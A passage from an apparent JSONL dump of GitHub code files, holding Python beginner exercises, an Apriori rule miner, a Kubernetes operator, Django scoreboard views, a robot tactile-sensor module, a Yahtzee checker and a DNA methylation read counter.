screen.tracer(1)\n\n\n\nscreen.exitonclick()","repo_name":"Tiago-S-Ribeiro/Python-Pro-Bootcamp","sub_path":"100_days_of_code/Intermediate/day_22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"32720098242","text":"# Escreva um codigo que leia um mumero de até 4 digitos e consiga determinar\r\n# quantas unidades, dezenas, centenas e\r\n# unidades de milhar o numero tem, e repita enquanto o usuario nao digitar um numero válido\r\n\r\n# while (True):\r\n# numero = input(\"Escreva um número inteiro de até 4 digitos: \")\r\n# if (numero.isnumeric()):\r\n# if (len(numero) <= 4):\r\n# numero = int(numero) # 6575\r\n# m = numero // 1000 # 6\r\n# c = (numero - (1000*m)) // 100 # (6575 - 6000) //100 = 5\r\n# d = ((numero - (1000*m)) - (100*c)) // 10 # 7\r\n# u = (((numero - (1000*m)) - (100*c)) - (10*d)) # 5\r\n# print(f\"\"\"\r\n# Unidades = {u}\r\n# Dezenas = {d}\r\n# Centenas = {c}\r\n# Milhares = {m}\r\n# \"\"\")\r\n# break\r\n# else:\r\n# print(\"Você deve escrever um número de até 4 digitos!\")\r\n# else:\r\n# print(\"Você escreveu digitos que não são números!\")\r\n\r\n# unidades = (\"unidade\",\"dezena\",\"centena\",\"milhar\",\"dezena de milhar\",\"centena de milhar\",\"milhão\")\r\n\r\n# while(True):\r\n\r\n# numero = input(\"Escreva um número inteiro de até 7 digitos: \")\r\n# #numeroInvertido = []\r\n\r\n# if (numero.isnumeric()):\r\n# if (len(numero) <= 7):\r\n\r\n# for i in range(len(numero)):\r\n# print(f\"{unidades[-i-1]} = {numero[i]}\") # 1234567\r\n\r\n# break\r\n\r\n# else:\r\n# print(\"Você deve escrever um número de até 7 digitos!\")\r\n# else:\r\n# print(\"Você digitou algum caractere que não é número.\")\r\n\r\n \r\nnumero = int(input(\"Insira um numero de até 4 digitos: \"))\r\n\r\nresposta = numero\r\n\r\nm = 0\r\nc = 0\r\nd = 0\r\nu = 0\r\n\r\nwhile(resposta!=0):\r\n if(resposta>=1000):\r\n resposta -= 1000\r\n m += 1\r\n elif (resposta>=100):\r\n resposta -= 100\r\n c += 1\r\n elif (resposta>=10):\r\n resposta -= 10\r\n d += 1\r\n elif (resposta>=1):\r\n resposta -= 1\r\n u += 1\r\n else: break\r\n\r\nprint(f\"\"\"Número inicial {numero} \r\nMilhares {m} \r\nCentenas {c}\r\nDezenas {d}\r\nUnidades {u} \"\"\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"TarikPonciano/Programador-de-Sistema-SENAC","sub_path":"Programador de Sistemas - UC 1/Repositório de Exemplos/Resolução 
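# ---- editor's note: equipe4.py below counts milhares/centenas/dezenas/
# ---- unidades by repeated subtraction; divmod does the same decomposition
# ---- directly. Sketch only, using the exercise's own worked value 6575.
numero = 6575
m, resto = divmod(numero, 1000)
c, resto = divmod(resto, 100)
d, u = divmod(resto, 10)
print(f"Milhares {m}, Centenas {c}, Dezenas {d}, Unidades {u}")
# Milhares 6, Centenas 5, Dezenas 7, Unidades 5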
Olimpiada/equipe4.py","file_name":"equipe4.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"pt","doc_type":"code","stars":5,"dataset":"github-code","pt":"34"} +{"seq_id":"72044893539","text":"'''ZADANIE 6'''\r\n# Napisać program, który pobiera od użytkownika ciąg liczb całkowitych. Pobieranie\r\n# danych kończone jest podaniem wartości 0 (nie wliczana do danych). W następ-\r\n# nej kolejności program powinien wyświetlić sumę największej oraz najmniejszej z\r\n# podanych liczb oraz ich średnią arytmetyczną.\r\n# \r\n# Przykład:\r\n# Użytkownik podał ciąg: 1, -4, 2, 17, 0.\r\n# Wynik programu:\r\n# 13 // suma min. i maks.\r\n# 6.5 // średnia\r\n\r\n'''ROZWIĄZANIE'''\r\n# Function\r\n# Zabezpiecza przed wprowadzeniem wartosci innej niż liczba całkowita\r\n# Tworzy listę\r\ndef load_num(text):\r\n try:\r\n my_num = int(input(text))\r\n except ValueError:\r\n my_num = load_num(\"Błąd. Podaj liczbę całkowitą: \")\r\n return user_list.append(my_num) #Nie ma potrzeby definiowania parametru\r\n# dla listy, bo używamy tylko jednej (więc okreslamy ją z góry).\r\n\r\n# Inputy i zmienne\r\nuser_list = []\r\nuser_num = load_num(\"Podaj liczbę: \")\r\n\r\n# Wykonuje funkcję dopóki użytkownik nie poda 0\r\nwhile not (0 in user_list):\r\n user_num = load_num(\"Podaj liczbę: \")\r\n\r\n# Oczyszcza listę z niepoprawnych wartosci i usuwa 0\r\nwhile None in user_list:\r\n user_list.remove(None)\r\n\r\nuser_list.remove(0)\r\n\r\nprint() # dodaje odstęp\r\n\r\n# Output \r\nuser_sum = min(user_list) + max(user_list)\r\nprint(f\"{user_sum:5} // suma min. i maks.\")\r\n\r\nuser_avg = user_sum / 2\r\nprint(f\"{user_avg:5} // średnia\")\r\n","repo_name":"jarsonX/Learning_Python","sub_path":"_exercises/beginners/in-polish/Zadanie-000006.py","file_name":"Zadanie-000006.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"pl","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"40068018809","text":"import pandas as pd\nimport argparse\nimport sys\nimport time\n\ndef init_apriori(dataset, min_support):\n # Declaring the lists and sets to house the 1-itemset\n list_dataset = dataset.values.tolist()\n first_candid = set()\n\n for row in list_dataset:\n for element in row:\n if not pd.isna(element):\n first_candid.add(element)\n\n first_candid = sorted(first_candid)\n\n # Begin to apply the apriori principle\n count_apriori_list = count_itemsets(list_dataset, first_candid)\n total_trans = len(list_dataset)\n reduce_apriori_list = reduce_itemsets(count_apriori_list, min_support, total_trans)\n\n return reduce_apriori_list, count_apriori_list\n\ndef count_itemsets(list_dataset, candid_list):\n candid_list = list(candid_list)\n count_elem_list = {item: 0 for item in candid_list}\n\n if isinstance(candid_list[0], tuple):\n # Begin to count the occurrences of the k+1 itemset\n for transaction in list_dataset:\n for candidate in candid_list:\n if set(candidate).issubset(set(transaction)):\n count_elem_list[candidate] += 1\n else:\n # Enter this if it is the first time in counting the itemset\n for transaction in list_dataset:\n for candidate in candid_list:\n if pd.isna(candidate):\n continue\n count_elem_list[candidate] += transaction.count(candidate)\n\n return count_elem_list\n\ndef reduce_itemsets(count_itemsets, min_support, total_trans):\n # Reduce the itemsets where the support value does not meet the minimum support value\n frequent_itemsets = {}\n\n for items, item_count in count_itemsets.items():\n if item_count / total_trans >= min_support:\n 
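# ---- editor's note: a tighter take on Zadanie 6 above -- the original's
# ---- recursive retry in load_num() appends None entries into user_list that
# ---- must be scrubbed afterwards. Reading until the 0 sentinel with an
# ---- explicit retry loop avoids that cleanup pass. Prompts shortened;
# ---- behaviour otherwise per the spec.
def read_ints():
    nums = []
    while True:
        try:
            n = int(input("Podaj liczbę: "))
        except ValueError:
            print("Błąd. Podaj liczbę całkowitą.")
            continue
        if n == 0:          # sentinel, not counted
            return nums
        nums.append(n)

nums = read_ints()          # e.g. 1, -4, 2, 17, 0 -> [1, -4, 2, 17]
total = min(nums) + max(nums)
print(total)                # 13  // suma min. i maks.
print(total / 2)            # 6.5 // średnia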
frequent_itemsets[items] = item_count\n\n return frequent_itemsets\n\ndef generate_candidates(prev_frequent, k):\n # Generates possible new frequent itemsets\n candidates = set()\n\n for prev1 in prev_frequent:\n for prev2 in prev_frequent:\n merged = sorted(list(set(prev1) | set(prev2)))\n\n if len(merged) == k:\n candidates.add(tuple(merged))\n\n return candidates\n\ndef extract_rules(frequent_itemsets, min_confidence):\n # Begin to create the association rules for the known frequent itemsets mined\n rules = []\n\n for items, count in frequent_itemsets.items():\n if len(items) > 1:\n for i in range(len(items)):\n antecedent = list(items[:i]) + list(items[i + 1:])\n precedent = items[i]\n conf = count / frequent_itemsets.get(tuple(antecedent), 1)\n\n if conf >= min_confidence:\n rules.append((antecedent, precedent, conf))\n\n return rules\n\ndef apriori(dataset, min_support, min_confidence):\n # First level candidates\n reduced, counts = init_apriori(dataset, min_support)\n\n # Hold the frequent itemsets and counts\n all_frequent = {tuple([k]): v for k, v in reduced.items()}\n\n k = 2\n\n # Enter this loop if we found initial frequent itemsets\n while True:\n candidates = generate_candidates(all_frequent.keys(), k)\n if not candidates:\n break\n\n count = count_itemsets(dataset.values.tolist(), candidates)\n\n frequent = reduce_itemsets(count, min_support, len(dataset))\n\n if not frequent:\n break\n\n all_frequent.update(frequent)\n k += 1\n\n # Extract association rules\n rules = extract_rules(all_frequent, min_confidence)\n return all_frequent, rules\n\n\ndef parse_args(argv):\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-s', '--min-support', metavar='float',\n help='Minimum support ratio (must be > 0, default: 0.1).',\n type=float, default=0.1)\n parser.add_argument(\n '-c', '--min-confidence', metavar='float',\n help='Minimum confidence (default: 0.5).',\n type=float, default=0.5)\n parser.add_argument(\n '-f', '--file', metavar='path',\n help='Path to the CSV dataset.',\n required=True)\n\n args = parser.parse_args(argv)\n return args\n\n\ndef main():\n args = parse_args(sys.argv[1:])\n dataset = pd.read_csv(args.file, header=None)\n\n # Sterilizing data in-place\n dataset = dataset.fillna('')\n dataset = dataset.apply(lambda row: [item for item in row if item != ''], axis=1)\n\n print(\"Processing Dataset:\")\n start_apr_time = time.time()\n freq_itemsets, rules = apriori(dataset, args.min_support, args.min_confidence)\n end_apr_time = time.time()\n\n print(\"Transactions:\", dataset.values.tolist())\n\n if not rules:\n print(\"\\nNo association rules could be generated for this dataset.\")\n else:\n print(\"\\nAssociation Rules:\")\n for r in rules:\n print(f\"{r[0]} => {r[1]}, confidence = {r[2]:.2f}\")\n\n elapsed_apr_time = end_apr_time - start_apr_time # Capture compute time\n print(f\"Elapsed Apriori Algorithm Time: {elapsed_apr_time:.6f} seconds\\n\")\n\n\nif __name__ == '__main__':\n main()","repo_name":"colorlikewhite/projects","sub_path":"Apriori Algorithm/AprioriAlgorithm.py","file_name":"AprioriAlgorithm.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"15623453500","text":"import random\nimport logging\nfrom kubernetes import client\nfrom mizar.obj.bouncer import Bouncer\nfrom mizar.obj.divider import Divider\nfrom mizar.obj.endpoint import Endpoint\nfrom mizar.common.constants import *\nfrom mizar.common.common import *\nfrom mizar.obj.net 
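# ---- editor's note: a standalone peek at the candidate-growth step above.
# ---- generate_candidates merges every pair of frequent itemsets and keeps
# ---- merges of exactly size k -- a correct superset of the classic shared-
# ---- prefix F(k-1) x F(k-1) join, just with more pairs to count. Toy data:
def _generate_candidates(prev_frequent, k):
    candidates = set()
    for a in prev_frequent:
        for b in prev_frequent:
            merged = tuple(sorted(set(a) | set(b)))
            if len(merged) == k:
                candidates.add(merged)
    return candidates

_freq1 = [('bread',), ('eggs',), ('milk',)]
print(sorted(_generate_candidates(_freq1, 2)))
# [('bread', 'eggs'), ('bread', 'milk'), ('eggs', 'milk')]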
import Net\nfrom mizar.store.operator_store import OprStore\n\nlogger = logging.getLogger()\n\n\nclass BouncerOperator(object):\n _instance = None\n\n def __new__(cls, **kwargs):\n if cls._instance is None:\n cls._instance = super(BouncerOperator, cls).__new__(cls)\n cls._init(cls, **kwargs)\n return cls._instance\n\n def _init(self, **kwargs):\n logger.info(kwargs)\n self.store = OprStore()\n load_k8s_config()\n self.obj_api = client.CustomObjectsApi()\n\n def query_existing_bouncers(self):\n logger.info(\"bouncer on_startup\")\n\n def list_bouncers_obj_fn(name, spec, plurals):\n logger.info(\"Bootstrapped Bouncer {}\".format(name))\n b = Bouncer(name, self.obj_api, self.store, spec)\n self.store_update(b)\n\n kube_list_obj(self.obj_api, RESOURCES.droplets, list_bouncers_obj_fn)\n\n def get_bouncer_tmp_obj(self, name, spec):\n return Bouncer(name, self.obj_api, None, spec)\n\n def get_bouncer_stored_obj(self, name, spec):\n return Bouncer(name, self.obj_api, self.store, spec)\n\n def store_update(self, b):\n self.store.update_bouncer(b)\n\n def set_bouncer_provisioned(self, bouncer):\n bouncer.set_status(OBJ_STATUS.bouncer_status_provisioned)\n self.store_update(bouncer)\n bouncer.update_obj()\n\n def update_bouncers_with_divider(self, div, task):\n bouncers = self.store.get_bouncers_of_vpc(div.vpc)\n for b in list(bouncers.values()):\n b.update_vpc(set([div]), task)\n\n def delete_divider_from_bouncers(self, div, task):\n bouncers = self.store.get_bouncers_of_vpc(div.vpc)\n for b in list(bouncers.values()):\n b.update_vpc(set([div]), task, False)\n\n def update_endpoint_with_bouncers(self, ep, task):\n self.update_endpoint_obj_with_bouncers(ep)\n bouncers = self.store.get_bouncers_of_net(ep.net)\n if not bouncers:\n task.raise_temporary_error(\n \"Provisiond EP {}: Bouncers not yet ready!\".format(ep.name))\n eps = set([ep])\n for key in list(bouncers):\n bouncers[key].update_eps(eps, task)\n\n def update_endpoint_obj_with_bouncers(self, ep):\n bouncers = self.store.get_bouncers_of_net(ep.net)\n if ep.type == OBJ_DEFAULTS.ep_type_simple or ep.type == OBJ_DEFAULTS.ep_type_host:\n ep.update_bouncers_list(bouncers)\n\n def delete_endpoint_from_bouncers(self, ep):\n bouncers = self.store.get_bouncers_of_net(ep.net)\n eps = set([ep])\n for key in list(bouncers):\n bouncers[key].delete_eps(eps)\n self.store.update_bouncers_of_net(ep.net, bouncers)\n if ep.type == OBJ_DEFAULTS.ep_type_simple:\n ep.unload_transit_agent_xdp()\n\n def delete_vpc(self, bouncer):\n bouncer.delete_vpc()\n","repo_name":"CentaurusInfra/mizar","sub_path":"mizar/dp/mizar/operators/bouncers/bouncers_operator.py","file_name":"bouncers_operator.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"34"} +{"seq_id":"24917293250","text":"\"\"\" Check PEP257. \"\"\"\n\nfrom .. import Linter as BaseLinter\n\n\nclass Linter(BaseLinter):\n\n \"\"\" Mccabe code complexity. 
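# ---- editor's note: BouncerOperator above guards construction with __new__
# ---- to get one operator per process. A stripped illustration of the idiom
# ---- (the original passes cls into _init, which works but shadows self):
class _Singleton:
    _instance = None

    def __new__(cls, **kwargs):
        if cls._instance is None:
            cls._instance = super().__new__(cls)
            cls._instance._init(**kwargs)
        return cls._instance

    def _init(self, **kwargs):
        self.config = kwargs            # runs once, on first construction

_a = _Singleton(region="us-east-1")
_b = _Singleton(region="ignored")       # same object; _init is not re-run
assert _a is _b and _a.config == {"region": "us-east-1"}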
\"\"\"\n\n @staticmethod\n def run(path, code=None, **meta):\n \"\"\" PEP257 code checking.\n\n :return list: List of errors.\n\n \"\"\"\n from .pep257 import PEP257Checker\n\n errors = []\n for er in PEP257Checker().check_source(code, path):\n errors.append(dict(\n lnum=er.line,\n text=er.message,\n type='D',\n ))\n return errors\n","repo_name":"vim-scripts/Python-mode-klen","sub_path":"pymode/libs/pylama/lint/pylama_pep257/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"34"} +{"seq_id":"28438180449","text":"\"\"\"Crie um programa que vai ler vários números e colocar em uma lista.\nDepois disso, crie duas listas extras que vão conter apenas os valores pares e os valores ímpares digitados, respectivamente.\nAo final, mostre o conteúdo das três listas geradas.\"\"\"\nprint(\"Welcome to my program!\\nI'll show to you even and odd numbers\")\nprint('-='*20)\n\nlist = []\neven = []\nodd = []\nwhile True:\n n = int(input('Type a number: '))\n list.append(n)\n if n % 2 == 0:\n even.append(n)\n else:\n odd.append(n)\n stop = str(input('Want continue? [Y/N]')).upper()\n if stop == 'Y':\n continue\n elif stop == 'N':\n break\n else:\n print('Probably you typed wrong, try again:')\nprint(f'The main list is {list}')\nprint(f'The even numbers in list is: {even}')\nprint(f'The odd numbers in list is: {odd}')\nprint('\\nGoodbye!')\n","repo_name":"Luiz-Pericles/Aulas-do-CEV_Python","sub_path":"Exercícios_CEV/Aula 17/Desafio aula 17 - Leia valores e mostre os pares e impares.py","file_name":"Desafio aula 17 - Leia valores e mostre os pares e impares.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30503686150","text":"from django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, Http404\nfrom django.core.exceptions import PermissionDenied\nfrom django.utils import timezone\nfrom django.template import RequestContext\nfrom django.contrib.admin.views.decorators import staff_member_required\nfrom django.db.models import F\n\nfrom tsw.models import *\n\nimport urllib2\nfrom datetime import timedelta\nfrom random import randint\nimport json\nimport math\n\n\ndef _increment_metric(metric, n=0):\n metric_count, created = MetricCount.objects.get_or_create(metric=metric, n=n, defaults={'count': 1})\n if not created:\n metric_count.count = F('count') + 1\n metric_count.save()\n\ndef server_info(request):\n domain = request.GET.get('domain', 'UNKNOWN').strip('/')\n domain = urllib2.unquote(domain) # %20 to space, etc\n version = int(request.GET.get('version', '0').strip('/'))\n # count how many times people hit the shell\n _increment_metric('server_info', version)\n _increment_metric('domain: %s' % domain, version)\n response_data = {\n # base url should not have http, swf url can\n 'base_url': 'www.almostmatt.com/dj/tsw',\n 'swf_url': 'http://www.almostmatt.com/tsw/tsw_v0.swf' # % version\n }\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n@csrf_exempt\ndef log_metric(request):\n #user_id = int(request.POST.get(\"user_id\", 0))\n metric = request.POST.get(\"metric\", 'None')\n n = int(request.POST.get(\"n\", 0))\n #secret_code = int(request.POST.get(\"secret_code\"))\n #try:\n # u = User.objects.get(pk=user_id)\n # if u.secret_code != secret_code:\n # raise PermissionDenied()\n #except User.DoesNotExist:\n # raise 
PermissionDenied()\n _increment_metric(metric, n)\n response_data = {}\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n@csrf_exempt\ndef new_user(request):\n name = request.POST.get(\"name\", \"\")\n domain = request.POST.get(\"domain\", None)\n referrer = request.META.get('HTTP_REFERER', None)\n\n if name == \"\":\n name = \"Anon%s\" % randint(100, 9999) # duplicates are OK\n _increment_metric(\"anonymous\")\n\n # with shell, shell sets domain and it is passed as an arg\n # with inner, the request comes from where it is hosted\n if referrer and (domain is None or domain.strip(\"/\") == \"\"):\n ref_split = referrer.split(\"//\")\n domain = ref_split[0] if len(ref_split) == 1 else ref_split[1]\n domain = domain.split(\"/\")[0]\n if domain:\n _increment_metric(\"new_user: %s\" % domain.strip(\"/\"))\n\n u = User.objects.create(name=name[:63], create_date=timezone.now(),\n secret_code=randint(0, 1000000000), domain=domain)\n response_data = {\n 'user_id' : u.id,\n 'secret_code' : u.secret_code,\n 'name' : u.name,\n 'create_date' : str(u.create_date),\n }\n response = HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n return response\n\n@csrf_exempt\ndef change_name(request, user_id, name):\n # add a password (or a \"secret\" random number)\n # the user could download all of their best scores and replays if they have password association\n secret_code = int(request.POST.get(\"secret_code\"))\n\n try:\n u = User.objects.get(pk=user_id)\n if u.secret_code != secret_code:\n raise PermissionDenied()\n except User.DoesNotExist:\n raise PermissionDenied()\n\n u.name = name\n u.save()\n response_data = {\n 'user_id' : u.id,\n 'name' : u.name,\n 'create_date' : str(u.create_date)\n }\n return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n\n\ndef get_domain_update(request):\n user_id = int(request.GET.get(\"user_id\", 0))\n secret_code = int(request.GET.get(\"secret_code\"))\n\n referrer = request.META.get('HTTP_REFERER', None)\n\n if referrer:\n ref_split = referrer.split(\"//\")\n domain = ref_split[0] if len(ref_split) == 1 else ref_split[1]\n domain = domain.split(\"/\")[0]\n\n _increment_metric(\"domain_updated: %s\" % domain.strip(\"/\"))\n\n try:\n u = User.objects.get(pk=user_id)\n if u.secret_code != secret_code:\n raise PermissionDenied()\n # if it is already a good value, leave it as is\n if (u.domain == \"www.almostmatt.com\" or u.domain == \"\" or u.domain == None):\n u.domain = domain\n u.save()\n except User.DoesNotExist:\n raise PermissionDenied()\n\n response_data = {}\n response = HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n return response\n\n","repo_name":"AlmostMatt/ScoreBoard","sub_path":"tsw/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"7248751861","text":"num = []\nposnum=[]\n\nwhile True:\n print('------- Adicionando Números a Lista----------')\n n1 = int(input('Digite um número: '))\n if(n1 == 999):\n break\n num.append(n1)\nfor c in range(0,len(num)):\n if 2 in num:\n num.remove(2)\n\nprint(num)","repo_name":"Apache0001/Curso-de-Python","sub_path":"Listas/listas.py","file_name":"listas.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"70730025378","text":"import numpy, openravepy\n\nclass 
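# ---- editor's note: the snippet just above strips 2s by calling
# ---- num.remove(2) inside an index loop -- it works, but each remove()
# ---- rescans and reshuffles the list. A comprehension filters in one pass
# ---- without mutating the list while looping over it.
num = [2, 5, 2, 9, 2]
num = [n for n in num if n != 2]
print(num)  # [5, 9]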
TactileArray(object):\n def __init__(self, offset, origins, normals):\n self.offset = numpy.array(offset, dtype='float')\n self.origins = numpy.array(origins, dtype='float')\n self.normals = numpy.array(normals, dtype='float')\n\n def __repr__(self):\n return 'TactileArray(offset={0:r}, origins=<{1:d}x{2:d} array>, normals=<{3:d}x{4:d} array>)'.format(\n self.offset, self.origins.shape[0], self.origins.shape[1],\n self.normals.shape[0], self.origins.shape[1])\n\n def __len__(self):\n return self.origins.shape[0]\n\n def get_geometry(self, link_pose):\n offset = self.get_offset(link_pose)\n origins = numpy.dot(offset[0:3, 0:3], self.origins.T) + offset[0:3, 3].reshape((3, 1))\n normals = numpy.dot(offset[0:3, 0:3], self.normals.T)\n return origins.T, normals.T\n\n def get_offset(self, link_pose):\n return numpy.dot(link_pose, self.offset)\n\n @classmethod\n def from_yaml(cls, array_yaml):\n offset_quaternion = numpy.array(array_yaml['offset']['orientation'], dtype='float')\n offset_pose = openravepy.matrixFromQuat(offset_quaternion)\n offset_pose[0:3, 3] = numpy.array(array_yaml['offset']['position'], dtype='float')\n return cls(offset_pose, array_yaml['origin'], array_yaml['normal'])\n\nclass TactileSensor(object):\n def __init__(self):\n self.arrays = dict()\n\n def get_geometry(self, robot):\n all_origins = list()\n all_normals = list()\n\n for link_name, tactile_array in self.arrays.items():\n link_pose = robot.GetLink(link_name).GetTransform()\n array_origins, array_normals = tactile_array.get_geometry(link_pose)\n all_origins.append(array_origins)\n all_normals.append(array_normals)\n\n return numpy.vstack(all_origins), numpy.vstack(all_normals)\n\n def render_values(self, robot, values, scale=1.0, color=None, linewidth=2):\n all_lines = list()\n\n if color is None:\n color = numpy.array([ 1., 0., 0., 1. ])\n\n if isinstance(values, dict):\n all_values = list()\n for link_name in self.arrays.keys():\n all_values.extend(values[link_name])\n else:\n all_values = values\n\n num_cells = len(all_values)\n all_values = numpy.array(all_values, dtype='float')\n origins, normals = self.get_geometry(robot)\n lines = numpy.empty((2 * num_cells, 3))\n lines[0::2, :] = origins\n lines[1::2, :] = origins + scale * all_values.reshape((num_cells, 1)) * normals\n return robot.GetEnv().drawlinelist(lines, linewidth, color)\n\n def render_cells(self, robot, origins=True, normals=True, spheres=True, color=None,\n size=0.0025, linewidth=2, length=0.01):\n if color is None:\n color = numpy.array([ 1., 1., 0., 1. 
])\n\n all_origins, all_normals = self.get_geometry(robot)\n handles = list()\n\n if normals:\n lines = numpy.empty((2 * all_origins.shape[0], 3))\n lines[0::2, :] = all_origins\n lines[1::2, :] = all_origins + length * all_normals\n handle = robot.GetEnv().drawlinelist(lines, linewidth, color)\n handles.append(handle)\n\n if spheres:\n handle = robot.GetEnv().plot3(all_origins, size, color, True)\n handles.append(handle)\n\n if origins:\n for tactile_array in self.arrays.values():\n handle = openravepy.misc.DrawAxes(robot.GetEnv(), tactile_array.offset,\n dist=0.02, linewidth=linewidth)\n handles.append(handle)\n\n return handles\n\n @classmethod\n def from_yaml(cls, path):\n # Load the tactile cell origins and normals from YAML.\n with open(path, 'rb') as stream:\n import yaml\n tactile_yaml = yaml.load(stream)\n\n # Create a TactileArray object for each entry in the file.\n sensor = cls()\n for link_name, array_yaml in tactile_yaml.items():\n sensor.arrays[link_name] = TactileArray.from_yaml(array_yaml)\n\n return sensor\n","repo_name":"personalrobotics/prpy","sub_path":"src/prpy/tactile.py","file_name":"tactile.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"34"} +{"seq_id":"70076057377","text":"import time\n\ndef main():\n x = True\n while x:\n start_time = time.time()\n for x in range(0,1000):\n hand = dieRoll(5)\n hand.sort()\n if isFullHouse(hand):\n print(\"Full House {} - {}\".format(x,hand))\n if isLargeStraight(hand):\n print(\"Large Straight {} - {}\".format(x,hand))\n if isYahtzee(hand):\n print(\"Yahtzee!! {} - {}\".format(x,hand))\n print(\"time={}\".format(time.time()-start_time))\n x = False\n\n\ndef dieRoll(dieCount):\n import random\n if type(dieCount) != int:\n raise TypeError('dieCount must be a positive integer =< 5')\n if dieCount < 1 or dieCount > 5:\n raise ValueError('dieCount must be a positive integer =< 5')\n roll = []\n i=0\n while i < dieCount:\n roll.append(random.randint(1,6))\n i += 1\n return roll\n\ndef isFullHouse(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 2:\n y = next(iter(count_unique))\n if hand.count(y) == 2 or hand.count(y) == 3:\n return True\n return False\n\ndef isLargeStraight(hand):\n if len(hand) != 5:\n return False\n hand.sort()\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 5:\n if hand[4] - hand[0] == 4:\n return True\n return False\n\ndef isYahtzee(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) == 1:\n return True\n return False\n\ndef isSmallStraight(hand):\n if len(hand) != 5:\n return False\n count_unique = set()\n for x in hand:\n count_unique.add(x)\n if len(count_unique) < 4:\n return False\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"djuniversal/Yahtzee","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"8915664029","text":"from collections import defaultdict\nimport re\nimport pandas as pd\nimport pysam\n\nREVERSE_READ_MCH_CONTEXT = {'CA', 'CC', 'CT'}\nFORWARD_READ_MCH_CONTEXT = {'AG', 'TG', 'GG'}\n\n\ndef single_read_mch_level(read, nome=False, frac=False):\n \"\"\"\n\n Parameters\n ----------\n read\n nome\n If True, skip all the GpC context as it is subject to methylation\n 
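# ---- editor's note: the heart of TactileArray.get_geometry above, checked
# ---- standalone -- a 4x4 pose rotates both cell origins and normals but
# ---- translates only the origins (normals are directions). Separately,
# ---- from_yaml calls yaml.load(stream) with no Loader, which newer PyYAML
# ---- rejects; yaml.safe_load(stream) is the usual fix.
import numpy as np

pose = np.eye(4)
pose[:3, :3] = [[0, -1, 0], [1, 0, 0], [0, 0, 1]]    # +90 deg yaw
pose[:3, 3] = [1.0, 0.0, 0.0]                        # then shift along x

origins = np.array([[0.1, 0.0, 0.0]])
normals = np.array([[1.0, 0.0, 0.0]])
print((pose[:3, :3] @ origins.T + pose[:3, 3:4]).T)  # [[1.  0.1 0. ]] rotated + translated
print((pose[:3, :3] @ normals.T).T)                  # [[0. 1. 0.]]  rotated only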
frac\n\n Returns\n -------\n\n \"\"\"\n # ref seq is parsed based on read seq and MD tag, and do not depend on reverse or not\n ref_seq = read.get_reference_sequence().upper()\n ref_pos = read.get_reference_positions()\n # use dict instead of string is because ref_seq could contain blocks when skip happen\n ref_seq_dict = {pos: base for pos, base in zip(ref_pos, ref_seq)}\n read_seq = read.seq.upper()\n\n # only count mCH\n mch = 0\n cov = 0\n other_snp = 0\n if read.is_reverse: # read in reverse strand\n for read_pos, ref_pos, ref_base in read.get_aligned_pairs(\n matches_only=True, with_seq=True):\n read_base = read_seq[read_pos]\n ref_read_pair = ref_base + read_base\n try:\n ref_context = ref_seq_dict[ref_pos] + ref_seq_dict[ref_pos + 1]\n if nome:\n if ref_seq_dict[ref_pos - 1] == 'G':\n continue\n if ref_context not in REVERSE_READ_MCH_CONTEXT:\n continue\n except KeyError:\n # ref_seq_dict KeyError means position is on border or not continuous, skip that\n continue\n if ref_read_pair == 'CC': # C to C means unconverted and methylated\n cov += 1\n mch += 1\n elif ref_read_pair == 'CT': # C to T means converted and un-methylated\n cov += 1\n else:\n # other kinds of SNPs, do not count to cov\n other_snp += 1\n pass\n else: # read in forward strand\n for read_pos, ref_pos, ref_base in read.get_aligned_pairs(\n matches_only=True, with_seq=True):\n read_base = read_seq[read_pos]\n ref_read_pair = ref_base + read_base\n try:\n ref_context = ref_seq_dict[ref_pos - 1] + ref_seq_dict[ref_pos]\n if nome:\n if ref_seq_dict[ref_pos + 1] == 'C':\n continue\n if ref_context not in FORWARD_READ_MCH_CONTEXT:\n continue\n except KeyError:\n # ref_seq_dict KeyError means position is on border or not continuous, skip that\n continue\n if ref_read_pair == 'GG': # G to G means unconverted and methylated\n cov += 1\n mch += 1\n elif ref_read_pair == 'GA': # G to A means converted and un-methylated\n cov += 1\n else:\n # other kinds of SNPs, do not count to cov\n other_snp += 1\n pass\n if frac:\n return mch, cov, other_snp\n else:\n read_mch_frac = (mch / cov) if cov > 0 else 0\n return read_mch_frac, cov, other_snp\n\n\ndef 